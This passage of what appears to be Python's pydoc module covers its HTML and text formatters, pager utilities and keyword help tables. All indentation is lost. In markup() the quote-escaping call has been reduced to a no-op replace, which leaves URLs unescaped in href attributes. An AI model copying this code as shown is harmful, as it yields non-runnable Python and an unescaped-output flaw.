if ispackage:
text = '<strong>%s</strong> (package)' % name
else:
text = name
return '<a href="%s">%s</a>' % (url, text)
def filelink(self, url, path):
"""Make a link to source file."""
return '<a href="file:%s">%s</a>' % (url, path)
def markup(self, text, escape=None, funcs={}, classes={}, methods={}):
"""Mark up some plain text, given a context of symbols to look for.
Each context dictionary maps object names to anchor names."""
escape = escape or self.escape
results = []
here = 0
pattern = re.compile(r'\b((http|ftp)://\S+[\w/]|'
r'RFC[- ]?(\d+)|'
r'PEP[- ]?(\d+)|'
r'(self\.)?(\w+))')
while True:
match = pattern.search(text, here)
if not match: break
start, end = match.span()
results.append(escape(text[here:start]))
all, scheme, rfc, pep, selfdot, name = match.groups()
if scheme:
url = escape(all).replace('"', '"')
results.append('<a href="%s">%s</a>' % (url, url))
elif rfc:
url = 'http://www.rfc-editor.org/rfc/rfc%d.txt' % int(rfc)
results.append('<a href="%s">%s</a>' % (url, escape(all)))
elif pep:
url = 'http://www.python.org/dev/peps/pep-%04d/' % int(pep)
results.append('<a href="%s">%s</a>' % (url, escape(all)))
elif text[end:end+1] == '(':
results.append(self.namelink(name, methods, funcs, classes))
elif selfdot:
results.append('self.<strong>%s</strong>' % name)
else:
results.append(self.namelink(name, classes))
here = end
results.append(escape(text[here:]))
return ''.join(results)
# ---------------------------------------------- type-specific routines
def formattree(self, tree, modname, parent=None):
"""Produce HTML for a class tree as given by inspect.getclasstree()."""
result = ''
for entry in tree:
if type(entry) is type(()):
c, bases = entry
result = result + '<dt><font face="helvetica, arial">'
result = result + self.classlink(c, modname)
if bases and bases != (parent,):
parents = []
for base in bases:
parents.append(self.classlink(base, modname))
result = result + '(' + ', '.join(parents) + ')'
result = result + '\n</font></dt>'
elif type(entry) is type([]):
result = result + '<dd>\n%s</dd>\n' % self.formattree(
entry, modname, c)
return '<dl>\n%s</dl>\n' % result
def docmodule(self, object, name=None, mod=None, *ignored):
"""Produce HTML documentation for a module object."""
name = object.__name__ # ignore the passed-in name
try:
all = object.__all__
except AttributeError:
all = None
parts = name.split('.')
links = []
for i in range(len(parts)-1):
links.append(
'<a href="%s.html"><font color="#ffffff">%s</font></a>' %
('.'.join(parts[:i+1]), parts[i]))
linkedname = '.'.join(links + parts[-1:])
head = '<big><big><strong>%s</strong></big></big>' % linkedname
try:
path = inspect.getabsfile(object)
url = path
if sys.platform == 'win32':
import nturl2path
url = nturl2path.pathname2url(path)
filelink = self.filelink(url, path)
except TypeError:
filelink = '(built-in)'
info = []
if hasattr(object, '__version__'):
version = str(object.__version__)
if version[:11] == '$' + 'Revision: ' and version[-1:] == '$':
version = version[11:-1].strip()
info.append('version %s' % self.escape(version))
if hasattr(object, '__date__'):
info.append(self.escape(str(object.__date__)))
if info:
head = head + ' (%s)' % ', '.join(info)
docloc = self.getdocloc(object)
if docloc is not None:
docloc = '<br><a href="%(docloc)s">Module Reference</a>' % locals()
else:
docloc = ''
result = self.heading(
head, '#ffffff', '#7799ee',
'<a href=".">index</a><br>' + filelink + docloc)
modules = inspect.getmembers(object, inspect.ismodule)
classes, cdict = [], {}
for key, value in inspect.getmembers(object, inspect.isclass):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None or
(inspect.getmodule(value) or object) is object):
if visiblename(key, all, object):
classes.append((key, value))
cdict[key] = cdict[value] = '#' + key
for key, value in classes:
for base in value.__bases__:
key, modname = base.__name__, base.__module__
module = sys.modules.get(modname)
if modname != name and module and hasattr(module, key):
if getattr(module, key) is base:
if not key in cdict:
cdict[key] = cdict[base] = modname + '.html#' + key
funcs, fdict = [], {}
for key, value in inspect.getmembers(object, inspect.isroutine):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None or
inspect.isbuiltin(value) or inspect.getmodule(value) is object):
if visiblename(key, all, object):
funcs.append((key, value))
fdict[key] = '#-' + key
if inspect.isfunction(value): fdict[value] = fdict[key]
data = []
for key, value in inspect.getmembers(object, isdata):
if visiblename(key, all, object):
data.append((key, value))
doc = self.markup(getdoc(object), self.preformat, fdict, cdict)
doc = doc and '<tt>%s</tt>' % doc
result = result + '<p>%s</p>\n' % doc
if hasattr(object, '__path__'):
modpkgs = []
for importer, modname, ispkg in pkgutil.iter_modules(object.__path__):
modpkgs.append((modname, name, ispkg, 0))
modpkgs.sort()
contents = self.multicolumn(modpkgs, self.modpkglink)
result = result + self.bigsection(
'Package Contents', '#ffffff', '#aa55cc', contents)
elif modules:
contents = self.multicolumn(
modules, lambda t: self.modulelink(t[1]))
result = result + self.bigsection(
'Modules', '#ffffff', '#aa55cc', contents)
if classes:
classlist = [value for (key, value) in classes]
contents = [
self.formattree(inspect.getclasstree(classlist, 1), name)]
for key, value in classes:
contents.append(self.document(value, key, name, fdict, cdict))
result = result + self.bigsection(
'Classes', '#ffffff', '#ee77aa', ' '.join(contents))
if funcs:
contents = []
for key, value in funcs:
contents.append(self.document(value, key, name, fdict, cdict))
result = result + self.bigsection(
'Functions', '#ffffff', '#eeaa77', ' '.join(contents))
if data:
contents = []
for key, value in data:
contents.append(self.document(value, key))
result = result + self.bigsection(
'Data', '#ffffff', '#55aa55', '<br>\n'.join(contents))
if hasattr(object, '__author__'):
contents = self.markup(str(object.__author__), self.preformat)
result = result + self.bigsection(
'Author', '#ffffff', '#7799ee', contents)
if hasattr(object, '__credits__'):
contents = self.markup(str(object.__credits__), self.preformat)
result = result + self.bigsection(
'Credits', '#ffffff', '#7799ee', contents)
return result
def docclass(self, object, name=None, mod=None, funcs={}, classes={},
*ignored):
"""Produce HTML documentation for a class object."""
realname = object.__name__
name = name or realname
bases = object.__bases__
contents = []
push = contents.append
# Cute little class to pump out a horizontal rule between sections.
class HorizontalRule:
def __init__(self):
self.needone = 0
def maybe(self):
if self.needone:
push('<hr>\n')
self.needone = 1
hr = HorizontalRule()
# List the mro, if non-trivial.
mro = deque(inspect.getmro(object))
if len(mro) > 2:
hr.maybe()
push('<dl><dt>Method resolution order:</dt>\n')
for base in mro:
push('<dd>%s</dd>\n' % self.classlink(base,
object.__module__))
push('</dl>\n')
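        # Each spill* helper below renders the attributes that match its
        # predicate under the given heading and returns whatever is left,
        # so successive calls partition the attribute list by kind.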
def spill(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
try:
value = getattr(object, name)
except Exception:
# Some descriptors may meet a failure in their __get__.
# (bug #1785)
push(self._docdescriptor(name, value, mod))
else:
push(self.document(value, name, mod,
funcs, classes, mdict, object))
push('\n')
return attrs
def spilldescriptors(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
push(self._docdescriptor(name, value, mod))
return attrs
def spilldata(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
base = self.docother(getattr(object, name), name, mod)
if callable(value) or inspect.isdatadescriptor(value):
doc = getattr(value, "__doc__", None)
else:
doc = None
if doc is None:
push('<dl><dt>%s</dl>\n' % base)
else:
doc = self.markup(getdoc(value), self.preformat,
funcs, classes, mdict)
doc = '<dd><tt>%s</tt>' % doc
push('<dl><dt>%s%s</dl>\n' % (base, doc))
push('\n')
return attrs
attrs = [(name, kind, cls, value)
for name, kind, cls, value in classify_class_attrs(object)
if visiblename(name, obj=object)]
mdict = {}
for key, kind, homecls, value in attrs:
mdict[key] = anchor = '#' + name + '-' + key
try:
value = getattr(object, name)
except Exception:
# Some descriptors may meet a failure in their __get__.
# (bug #1785)
pass
try:
# The value may not be hashable (e.g., a data attr with
# a dict or list value).
mdict[value] = anchor
except TypeError:
pass
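        # Walk the MRO, peeling off the attributes each class defines so that
        # members are grouped under "defined here" or "inherited from ..."
        # according to their defining class.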
while attrs:
if mro:
thisclass = mro.popleft()
else:
thisclass = attrs[0][2]
attrs, inherited = _split_list(attrs, lambda t: t[2] is thisclass)
if thisclass is builtins.object:
attrs = inherited
continue
elif thisclass is object:
tag = 'defined here'
else:
tag = 'inherited from %s' % self.classlink(thisclass,
object.__module__)
tag += ':<br>\n'
# Sort attrs by name.
attrs.sort(key=lambda t: t[0])
# Pump out the attrs, segregated by kind.
attrs = spill('Methods %s' % tag, attrs,
lambda t: t[1] == 'method')
attrs = spill('Class methods %s' % tag, attrs,
lambda t: t[1] == 'class method')
attrs = spill('Static methods %s' % tag, attrs,
lambda t: t[1] == 'static method')
attrs = spilldescriptors('Data descriptors %s' % tag, attrs,
lambda t: t[1] == 'data descriptor')
attrs = spilldata('Data and other attributes %s' % tag, attrs,
lambda t: t[1] == 'data')
assert attrs == []
attrs = inherited
contents = ''.join(contents)
if name == realname:
title = '<a name="%s">class <strong>%s</strong></a>' % (
name, realname)
else:
title = '<strong>%s</strong> = <a name="%s">class %s</a>' % (
name, name, realname)
if bases:
parents = []
for base in bases:
parents.append(self.classlink(base, object.__module__))
title = title + '(%s)' % ', '.join(parents)
doc = self.markup(getdoc(object), self.preformat, funcs, classes, mdict)
        doc = doc and '<tt>%s<br>&nbsp;</tt>' % doc
return self.section(title, '#000000', '#ffc8d8', contents, 3, doc)
def formatvalue(self, object):
"""Format an argument default value as text."""
return self.grey('=' + self.repr(object))
def docroutine(self, object, name=None, mod=None,
funcs={}, classes={}, methods={}, cl=None):
"""Produce HTML documentation for a function or method object."""
realname = object.__name__
name = name or realname
anchor = (cl and cl.__name__ or '') + '-' + name
note = ''
skipdocs = 0
if inspect.ismethod(object):
imclass = object.__self__.__class__
if cl:
if imclass is not cl:
note = ' from ' + self.classlink(imclass, mod)
else:
if object.__self__ is not None:
note = ' method of %s instance' % self.classlink(
object.__self__.__class__, mod)
else:
note = ' unbound %s method' % self.classlink(imclass,mod)
object = object.__func__
if name == realname:
title = '<a name="%s"><strong>%s</strong></a>' % (anchor, realname)
else:
if (cl and realname in cl.__dict__ and
cl.__dict__[realname] is object):
reallink = '<a href="#%s">%s</a>' % (
cl.__name__ + '-' + realname, realname)
skipdocs = 1
else:
reallink = realname
title = '<a name="%s"><strong>%s</strong></a> = %s' % (
anchor, name, reallink)
if inspect.isfunction(object):
            args, varargs, varkw, defaults, kwonlyargs, kwdefaults, ann = \
                inspect.getfullargspec(object)
            argspec = inspect.formatargspec(
                args, varargs, varkw, defaults, kwonlyargs, kwdefaults, ann,
formatvalue=self.formatvalue,
formatannotation=inspect.formatannotationrelativeto(object))
if realname == '<lambda>':
title = '<strong>%s</strong> <em>lambda</em> ' % name
# XXX lambda's won't usually have func_annotations['return']
                # since the syntax doesn't support it, but it is possible.
# So removing parentheses isn't truly safe.
argspec = argspec[1:-1] # remove parentheses
else:
argspec = '(...)'
decl = title + argspec + (note and self.grey(
'<font face="helvetica, arial">%s</font>' % note))
if skipdocs:
return '<dl><dt>%s</dt></dl>\n' % decl
else:
doc = self.markup(
getdoc(object), self.preformat, funcs, classes, methods)
doc = doc and '<dd><tt>%s</tt></dd>' % doc
return '<dl><dt>%s</dt>%s</dl>\n' % (decl, doc)
def _docdescriptor(self, name, value, mod):
results = []
push = results.append
if name:
push('<dl><dt><strong>%s</strong></dt>\n' % name)
if value.__doc__ is not None:
doc = self.markup(getdoc(value), self.preformat)
push('<dd><tt>%s</tt></dd>\n' % doc)
push('</dl>\n')
return ''.join(results)
def docproperty(self, object, name=None, mod=None, cl=None):
"""Produce html documentation for a property."""
return self._docdescriptor(name, object, mod)
def docother(self, object, name=None, mod=None, *ignored):
"""Produce HTML documentation for a data object."""
lhs = name and '<strong>%s</strong> = ' % name or ''
return lhs + self.repr(object)
def docdata(self, object, name=None, mod=None, cl=None):
"""Produce html documentation for a data descriptor."""
return self._docdescriptor(name, object, mod)
def index(self, dir, shadowed=None):
"""Generate an HTML index for a directory of modules."""
modpkgs = []
if shadowed is None: shadowed = {}
for importer, name, ispkg in pkgutil.iter_modules([dir]):
modpkgs.append((name, '', ispkg, name in shadowed))
shadowed[name] = 1
modpkgs.sort()
contents = self.multicolumn(modpkgs, self.modpkglink)
return self.bigsection(dir, '#ffffff', '#ee77aa', contents)
# -------------------------------------------- text documentation generator
class TextRepr(Repr):
"""Class for safely making a text representation of a Python object."""
def __init__(self):
Repr.__init__(self)
self.maxlist = self.maxtuple = 20
self.maxdict = 10
self.maxstring = self.maxother = 100
def repr1(self, x, level):
if hasattr(type(x), '__name__'):
methodname = 'repr_' + '_'.join(type(x).__name__.split())
if hasattr(self, methodname):
return getattr(self, methodname)(x, level)
return cram(stripid(repr(x)), self.maxother)
def repr_string(self, x, level):
test = cram(x, self.maxstring)
testrepr = repr(test)
if '\\' in test and '\\' not in replace(testrepr, r'\\', ''):
# Backslashes are only literal in the string and are never
# needed to make any special characters, so show a raw string.
return 'r' + testrepr[0] + test + testrepr[0]
return testrepr
repr_str = repr_string
def repr_instance(self, x, level):
try:
return cram(stripid(repr(x)), self.maxstring)
except:
return '<%s instance>' % x.__class__.__name__
class TextDoc(Doc):
"""Formatter class for text documentation."""
# ------------------------------------------- text formatting utilities
_repr_instance = TextRepr()
repr = _repr_instance.repr
def bold(self, text):
"""Format a string in bold by overstriking."""
return ''.join(ch + '\b' + ch for ch in text)
def indent(self, text, prefix=' '):
"""Indent text by prepending a given prefix to each line."""
if not text: return ''
lines = [prefix + line for line in text.split('\n')]
if lines: lines[-1] = lines[-1].rstrip()
return '\n'.join(lines)
def section(self, title, contents):
"""Format a section with a given heading."""
clean_contents = self.indent(contents).rstrip()
return self.bold(title) + '\n' + clean_contents + '\n\n'
# ---------------------------------------------- type-specific routines
def formattree(self, tree, modname, parent=None, prefix=''):
"""Render in text a class tree as returned by inspect.getclasstree()."""
result = ''
for entry in tree:
if type(entry) is type(()):
c, bases = entry
result = result + prefix + classname(c, modname)
if bases and bases != (parent,):
parents = (classname(c, modname) for c in bases)
result = result + '(%s)' % ', '.join(parents)
result = result + '\n'
elif type(entry) is type([]):
result = result + self.formattree(
entry, modname, c, prefix + ' ')
return result
def docmodule(self, object, name=None, mod=None):
"""Produce text documentation for a given module object."""
name = object.__name__ # ignore the passed-in name
synop, desc = splitdoc(getdoc(object))
result = self.section('NAME', name + (synop and ' - ' + synop))
all = getattr(object, '__all__', None)
docloc = self.getdocloc(object)
if docloc is not None:
result = result + self.section('MODULE REFERENCE', docloc + """
The following documentation is automatically generated from the Python
source files. It may be incomplete, incorrect or include features that
are considered implementation detail and may vary between Python
implementations. When in doubt, consult the module reference at the
location listed above.
""")
if desc:
result = result + self.section('DESCRIPTION', desc)
classes = []
for key, value in inspect.getmembers(object, inspect.isclass):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None
or (inspect.getmodule(value) or object) is object):
if visiblename(key, all, object):
classes.append((key, value))
funcs = []
for key, value in inspect.getmembers(object, inspect.isroutine):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None or
inspect.isbuiltin(value) or inspect.getmodule(value) is object):
if visiblename(key, all, object):
funcs.append((key, value))
data = []
for key, value in inspect.getmembers(object, isdata):
if visiblename(key, all, object):
data.append((key, value))
modpkgs = []
modpkgs_names = set()
if hasattr(object, '__path__'):
for importer, modname, ispkg in pkgutil.iter_modules(object.__path__):
modpkgs_names.add(modname)
if ispkg:
modpkgs.append(modname + ' (package)')
else:
modpkgs.append(modname)
modpkgs.sort()
result = result + self.section(
'PACKAGE CONTENTS', '\n'.join(modpkgs))
# Detect submodules as sometimes created by C extensions
submodules = []
for key, value in inspect.getmembers(object, inspect.ismodule):
if value.__name__.startswith(name + '.') and key not in modpkgs_names:
submodules.append(key)
if submodules:
submodules.sort()
result = result + self.section(
'SUBMODULES', '\n'.join(submodules))
if classes:
classlist = [value for key, value in classes]
contents = [self.formattree(
inspect.getclasstree(classlist, 1), name)]
for key, value in classes:
contents.append(self.document(value, key, name))
result = result + self.section('CLASSES', '\n'.join(contents))
if funcs:
contents = []
for key, value in funcs:
contents.append(self.document(value, key, name))
result = result + self.section('FUNCTIONS', '\n'.join(contents))
if data:
contents = []
for key, value in data:
contents.append(self.docother(value, key, name, maxlen=70))
result = result + self.section('DATA', '\n'.join(contents))
if hasattr(object, '__version__'):
version = str(object.__version__)
if version[:11] == '$' + 'Revision: ' and version[-1:] == '$':
version = version[11:-1].strip()
result = result + self.section('VERSION', version)
if hasattr(object, '__date__'):
result = result + self.section('DATE', str(object.__date__))
if hasattr(object, '__author__'):
result = result + self.section('AUTHOR', str(object.__author__))
if hasattr(object, '__credits__'):
result = result + self.section('CREDITS', str(object.__credits__))
try:
file = inspect.getabsfile(object)
except TypeError:
file = '(built-in)'
result = result + self.section('FILE', file)
return result
def docclass(self, object, name=None, mod=None, *ignored):
"""Produce text documentation for a given class object."""
realname = object.__name__
name = name or realname
bases = object.__bases__
def makename(c, m=object.__module__):
return classname(c, m)
if name == realname:
title = 'class ' + self.bold(realname)
else:
title = self.bold(name) + ' = class ' + realname
if bases:
parents = map(makename, bases)
title = title + '(%s)' % ', '.join(parents)
doc = getdoc(object)
contents = doc and [doc + '\n'] or []
push = contents.append
# List the mro, if non-trivial.
mro = deque(inspect.getmro(object))
if len(mro) > 2:
push("Method resolution order:")
for base in mro:
push(' ' + makename(base))
push('')
# Cute little class to pump out a horizontal rule between sections.
class HorizontalRule:
def __init__(self):
self.needone = 0
def maybe(self):
if self.needone:
push('-' * 70)
self.needone = 1
hr = HorizontalRule()
def spill(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
try:
value = getattr(object, name)
except Exception:
# Some descriptors may meet a failure in their __get__.
# (bug #1785)
push(self._docdescriptor(name, value, mod))
else:
push(self.document(value,
name, mod, object))
return attrs
def spilldescriptors(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
push(self._docdescriptor(name, value, mod))
return attrs
def spilldata(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
if callable(value) or inspect.isdatadescriptor(value):
doc = getdoc(value)
else:
doc = None
push(self.docother(getattr(object, name),
name, mod, maxlen=70, doc=doc) + '\n')
return attrs
attrs = [(name, kind, cls, value)
for name, kind, cls, value in classify_class_attrs(object)
if visiblename(name, obj=object)]
while attrs:
if mro:
thisclass = mro.popleft()
else:
thisclass = attrs[0][2]
attrs, inherited = _split_list(attrs, lambda t: t[2] is thisclass)
if thisclass is builtins.object:
attrs = inherited
continue
elif thisclass is object:
tag = "defined here"
else:
tag = "inherited from %s" % classname(thisclass,
object.__module__)
# Sort attrs by name.
attrs.sort()
# Pump out the attrs, segregated by kind.
attrs = spill("Methods %s:\n" % tag, attrs,
lambda t: t[1] == 'method')
attrs = spill("Class methods %s:\n" % tag, attrs,
lambda t: t[1] == 'class method')
attrs = spill("Static methods %s:\n" % tag, attrs,
lambda t: t[1] == 'static method')
attrs = spilldescriptors("Data descriptors %s:\n" % tag, attrs,
lambda t: t[1] == 'data descriptor')
attrs = spilldata("Data and other attributes %s:\n" % tag, attrs,
lambda t: t[1] == 'data')
assert attrs == []
attrs = inherited
contents = '\n'.join(contents)
if not contents:
return title + '\n'
return title + '\n' + self.indent(contents.rstrip(), ' | ') + '\n'
def formatvalue(self, object):
"""Format an argument default value as text."""
return '=' + self.repr(object)
def docroutine(self, object, name=None, mod=None, cl=None):
"""Produce text documentation for a function or method object."""
realname = object.__name__
name = name or realname
note = ''
skipdocs = 0
if inspect.ismethod(object):
imclass = object.__self__.__class__
if cl:
if imclass is not cl:
note = ' from ' + classname(imclass, mod)
else:
if object.__self__ is not None:
note = ' method of %s instance' % classname(
object.__self__.__class__, mod)
else:
note = ' unbound %s method' % classname(imclass,mod)
object = object.__func__
if name == realname:
title = self.bold(realname)
else:
if (cl and realname in cl.__dict__ and
cl.__dict__[realname] is object):
skipdocs = 1
title = self.bold(name) + ' = ' + realname
if inspect.isfunction(object):
args, varargs, varkw, defaults, kwonlyargs, kwdefaults, ann = \
inspect.getfullargspec(object)
argspec = inspect.formatargspec(
args, varargs, varkw, defaults, kwonlyargs, kwdefaults, ann,
formatvalue=self.formatvalue,
formatannotation=inspect.formatannotationrelativeto(object))
if realname == '<lambda>':
title = self.bold(name) + ' lambda '
# XXX lambda's won't usually have func_annotations['return']
                # since the syntax doesn't support it, but it is possible.
# So removing parentheses isn't truly safe.
argspec = argspec[1:-1] # remove parentheses
else:
argspec = '(...)'
decl = title + argspec + note
if skipdocs:
return decl + '\n'
else:
doc = getdoc(object) or ''
return decl + '\n' + (doc and self.indent(doc).rstrip() + '\n')
def _docdescriptor(self, name, value, mod):
results = []
push = results.append
if name:
push(self.bold(name))
push('\n')
doc = getdoc(value) or ''
if doc:
push(self.indent(doc))
push('\n')
return ''.join(results)
def docproperty(self, object, name=None, mod=None, cl=None):
"""Produce text documentation for a property."""
return self._docdescriptor(name, object, mod)
def docdata(self, object, name=None, mod=None, cl=None):
"""Produce text documentation for a data descriptor."""
return self._docdescriptor(name, object, mod)
def docother(self, object, name=None, mod=None, parent=None, maxlen=None, doc=None):
"""Produce text documentation for a data object."""
repr = self.repr(object)
if maxlen:
line = (name and name + ' = ' or '') + repr
chop = maxlen - len(line)
if chop < 0: repr = repr[:chop] + '...'
line = (name and self.bold(name) + ' = ' or '') + repr
if doc is not None:
line += '\n' + self.indent(str(doc))
return line
class _PlainTextDoc(TextDoc):
"""Subclass of TextDoc which overrides string styling"""
def bold(self, text):
return text
# --------------------------------------------------------- user interfaces
def pager(text):
"""The first time this is called, determine what kind of pager to use."""
global pager
pager = getpager()
pager(text)
def getpager():
"""Decide what method to use for paging through text."""
if not hasattr(sys.stdout, "isatty"):
return plainpager
if not sys.stdin.isatty() or not sys.stdout.isatty():
return plainpager
if 'PAGER' in os.environ:
if sys.platform == 'win32': # pipes completely broken in Windows
return lambda text: tempfilepager(plain(text), os.environ['PAGER'])
elif os.environ.get('TERM') in ('dumb', 'emacs'):
return lambda text: pipepager(plain(text), os.environ['PAGER'])
else:
return lambda text: pipepager(text, os.environ['PAGER'])
if os.environ.get('TERM') in ('dumb', 'emacs'):
return plainpager
if sys.platform == 'win32' or sys.platform.startswith('os2'):
return lambda text: tempfilepager(plain(text), 'more <')
if hasattr(os, 'system') and os.system('(less) 2>/dev/null') == 0:
return lambda text: pipepager(text, 'less')
import tempfile
(fd, filename) = tempfile.mkstemp()
os.close(fd)
try:
if hasattr(os, 'system') and os.system('more "%s"' % filename) == 0:
return lambda text: pipepager(text, 'more')
else:
return ttypager
finally:
os.unlink(filename)
def plain(text):
"""Remove boldface formatting from text."""
return re.sub('.\b', '', text)
def pipepager(text, cmd):
"""Page through text by feeding it to another program."""
pipe = os.popen(cmd, 'w')
try:
pipe.write(text)
pipe.close()
except IOError:
pass # Ignore broken pipes caused by quitting the pager program.
def tempfilepager(text, cmd):
"""Page through text by invoking a program on a temporary file."""
import tempfile
filename = tempfile.mktemp()
file = open(filename, 'w')
file.write(text)
file.close()
try:
os.system(cmd + ' "' + filename + '"')
finally:
os.unlink(filename)
def ttypager(text):
"""Page through text on a text terminal."""
lines = plain(text).split('\n')
try:
import tty
fd = sys.stdin.fileno()
old = tty.tcgetattr(fd)
tty.setcbreak(fd)
getchar = lambda: sys.stdin.read(1)
except (ImportError, AttributeError):
tty = None
getchar = lambda: sys.stdin.readline()[:-1][:1]
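    # Keys while paging: 'q' quits, Return advances one line, 'b' or ESC goes
    # back one page, and any other key advances a full page.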
try:
        r = inc = int(os.environ.get('LINES', 25)) - 1
sys.stdout.write('\n'.join(lines[:inc]) + '\n')
while lines[r:]:
sys.stdout.write('-- more --')
sys.stdout.flush()
c = getchar()
if c in ('q', 'Q'):
sys.stdout.write('\r \r')
break
elif c in ('\r', '\n'):
sys.stdout.write('\r \r' + lines[r] + '\n')
r = r + 1
continue
if c in ('b', 'B', '\x1b'):
r = r - inc - inc
if r < 0: r = 0
sys.stdout.write('\n' + '\n'.join(lines[r:r+inc]) + '\n')
r = r + inc
finally:
if tty:
tty.tcsetattr(fd, tty.TCSAFLUSH, old)
def plainpager(text):
"""Simply print unformatted text. This is the ultimate fallback."""
sys.stdout.write(plain(text))
def describe(thing):
"""Produce a short description of the given thing."""
if inspect.ismodule(thing):
if thing.__name__ in sys.builtin_module_names:
return 'built-in module ' + thing.__name__
if hasattr(thing, '__path__'):
return 'package ' + thing.__name__
else:
return 'module ' + thing.__name__
if inspect.isbuiltin(thing):
return 'built-in function ' + thing.__name__
if inspect.isgetsetdescriptor(thing):
return 'getset descriptor %s.%s.%s' % (
thing.__objclass__.__module__, thing.__objclass__.__name__,
thing.__name__)
if inspect.ismemberdescriptor(thing):
return 'member descriptor %s.%s.%s' % (
thing.__objclass__.__module__, thing.__objclass__.__name__,
thing.__name__)
if inspect.isclass(thing):
return 'class ' + thing.__name__
if inspect.isfunction(thing):
return 'function ' + thing.__name__
if inspect.ismethod(thing):
return 'method ' + thing.__name__
return type(thing).__name__
def locate(path, forceload=0):
"""Locate an object by name or dotted path, importing as necessary."""
parts = [part for part in path.split('.') if part]
module, n = None, 0
while n < len(parts):
nextmodule = safeimport('.'.join(parts[:n+1]), forceload)
if nextmodule: module, n = nextmodule, n + 1
else: break
if module:
object = module
else:
object = builtins
for part in parts[n:]:
try:
object = getattr(object, part)
except AttributeError:
return None
return object
# --------------------------------------- interactive interpreter interface
text = TextDoc()
plaintext = _PlainTextDoc()
html = HTMLDoc()
def resolve(thing, forceload=0):
"""Given an object or a path to an object, get the object and its name."""
if isinstance(thing, str):
object = locate(thing, forceload)
if not object:
raise ImportError('no Python documentation found for %r' % thing)
return object, thing
else:
name = getattr(thing, '__name__', None)
return thing, name if isinstance(name, str) else None
def render_doc(thing, title='Python Library Documentation: %s', forceload=0,
renderer=None):
"""Render text documentation, given an object or a path to an object."""
if renderer is None:
renderer = text
object, name = resolve(thing, forceload)
desc = describe(object)
module = inspect.getmodule(object)
if name and '.' in name:
desc += ' in ' + name[:name.rfind('.')]
elif module and module is not object:
desc += ' in module ' + module.__name__
if not (inspect.ismodule(object) or
inspect.isclass(object) or
inspect.isroutine(object) or
inspect.isgetsetdescriptor(object) or
inspect.ismemberdescriptor(object) or
isinstance(object, property)):
# If the passed object is a piece of data or an instance,
# document its available methods instead of its value.
object = type(object)
desc += ' object'
return title % desc + '\n\n' + renderer.document(object, name)
def doc(thing, title='Python Library Documentation: %s', forceload=0,
output=None):
"""Display text documentation, given an object or a path to an object."""
try:
if output is None:
pager(render_doc(thing, title, forceload))
else:
output.write(render_doc(thing, title, forceload, plaintext))
except (ImportError, ErrorDuringImport) as value:
print(value)
def writedoc(thing, forceload=0):
"""Write HTML documentation to a file in the current directory."""
try:
object, name = resolve(thing, forceload)
page = html.page(describe(object), html.document(object, name))
file = open(name + '.html', 'w', encoding='utf-8')
file.write(page)
file.close()
print('wrote', name + '.html')
except (ImportError, ErrorDuringImport) as value:
print(value)
def writedocs(dir, pkgpath='', done=None):
"""Write out HTML documentation for all modules in a directory tree."""
if done is None: done = {}
for importer, modname, ispkg in pkgutil.walk_packages([dir], pkgpath):
writedoc(modname)
return
class Helper:
# These dictionaries map a topic name to either an alias, or a tuple
# (label, seealso-items). The "label" is the label of the corresponding
# section in the .rst file under Doc/ and an index into the dictionary
# in pydoc_data/topics.py.
#
# CAUTION: if you change one of these dictionaries, be sure to adapt the
# list of needed labels in Doc/tools/sphinxext/pyspecific.py and
# regenerate the pydoc_data/topics.py file by running
# make pydoc-topics
# in Doc/ and copying the output file into the Lib/ directory.
keywords = {
'False': '',
'None': '',
'True': '',
'and': 'BOOLEAN',
'as': 'with',
'assert': ('assert', ''),
'break': ('break', 'while for'),
'class': ('class', 'CLASSES SPECIALMETHODS'),
'continue': ('continue', 'while for'),
'def': ('function', ''),
'del': ('del', 'BASICMETHODS'),
'elif': 'if',
'else': ('else', 'while for'),
'except': 'try',
'finally': 'try',
'for': ('for', 'break continue while'),
'from': 'import',
'global': ('global', 'nonlocal NAMESPACES'),
'if': ('if', 'TRUTHVALUE'),
'import': ('import', 'MODULES'),
'in': ('in', 'SEQUENCEMETHODS'),
'is': 'COMPARISON',
'lambda': ('lambda', 'FUNCTIONS'),
'nonlocal': ('nonlocal', 'global NAMESPACES'),
'not': 'BOOLEAN',
'or': 'BOOLEAN',
'pass': ('pass', ''),
'raise': ('raise', 'EXCEPTIONS'),
'return': ('return', 'FUNCTIONS'),
'try': ('try', 'EXCEPTIONS'),
'while': ('while', 'break continue if TRUTHVALUE'),
'with': ('with', 'CONTEXTMANAGERS EXCEPTIONS yield'),
'yield': ('yield', ''),
}
# Either add symbols to this dictionary or to the symbols dictionary
# directly: Whichever is easier. They are merged later.
_symbols_inverse = {
'STRINGS' : ("'", "'''", "r'", "b'", '"""', '"', 'r"', 'b"'),
'OPERATORS' : ('+', '-', '*', '**', '/', '//', '%', '<<', '>>', '&',
'|', '^', '~', '<', '>', '<=', '>=', '==', '!=', '<>'),
'COMPARISON' : ('<', '>', '<=', '>=', '==', '!=', '<>'),
'UNARY' : ('-', '~'),
'AUGMENTEDASSIGNMENT' : ('+=', '-=', '*=', '/=', '%=', '&=', '|=',
'^=', '<<=', '>>=', '**=', '//='),
'BITWISE' : ('<<', '>>', '&', '|', '^', '~'),
'COMPLEX' : ('j', 'J')
}
symbols = {
'%': 'OPERATORS FORMATTING',
'**': 'POWER',
',': 'TUPLES LISTS FUNCTIONS',
'.': 'ATTRIBUTES FLOAT MODULES OBJECTS',
'...': 'ELLIPSIS',
':': 'SLICINGS DICTIONARYLITERALS',
'@': 'def class',
'\\': 'STRINGS',
'_': 'PRIVATENAMES',
'__': 'PRIVATENAMES SPECIALMETHODS',
'`': 'BACKQUOTES',
